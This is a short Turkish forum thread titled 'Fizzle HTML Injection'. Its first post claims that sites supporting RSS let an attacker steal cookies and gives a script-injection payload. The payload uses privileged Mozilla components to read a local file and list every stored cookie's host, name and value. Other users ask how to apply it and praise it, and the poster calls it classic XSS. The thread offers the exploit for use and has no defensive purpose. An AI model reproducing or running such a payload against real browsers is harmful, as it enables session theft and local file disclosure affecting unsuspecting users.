Fizzle HTML Injection

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    AntiOksidan
    AntiOksidan's avatar
    Kayıt Tarihi: 03/Ekim/2005
    Erkek
    .RSS desteği olan sitelerde saldırganın cookie çalmasına olanak sağlıyor.

    Code :


    <script>

    function read(readfile)
    {
    var file = Components.classes["@mozilla.org/file/local;1"]
    .createInstance(Components.interfaces.nsILocalFile);
    file.initWithPath(readfile);
    var is =
    Components.classes["@mozilla.org/network/file-input-stream;1"]
    .createInstance(Components.interfaces.nsIFileInputStream);
    is.init(file, 0x01, 00004, null);
    var sis =
    Components.classes["@mozilla.org/scriptableinputstream;1"]
    .createInstance(Components.interfaces.nsIScriptableInputStream);
    sis.init(is);
    var output = sis.read(sis.available());
    alert(output);
    }
    read("C: est.txt");

    function getCookies()
    {
    var cookieManager =
    Components.classes["@mozilla.org/cookiemanager;1"]
    .getService(Components.interfaces.nsICookieManager);
    var str = '';
    var iter = cookieManager.enumerator;
    while (iter.hasMoreElements())
    {
    var cookie = iter.getNext();
    if (cookie instanceof Components.interfaces.nsICookie)
    {
    str += "Host: " + cookie.host
    + " Name: " + cookie.name
    + " Value: " + cookie.value
    + " ";
    }
    }
    alert(str);
    }
    getCookies()

    </script>

  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    RhiFaT
    RhiFaT's avatar
    Kayıt Tarihi: 11/Mart/2004
    Erkek
    peki hocam bunu tam olarak nasıl kullanıyoruz bunu nereye yazıyoruz. ?

    işte öyle
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    AntiOksidan
    AntiOksidan's avatar
    Kayıt Tarihi: 03/Ekim/2005
    Erkek
    klasik xss hoja.
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    kozanaybar
    kozanaybar's avatar
    Kayıt Tarihi: 11/Kasım/2005
    Homo
    vaay çok taş olmuş :) isim de ayrı karizma :D
Toplam Hit: 11636 Toplam Mesaj: 4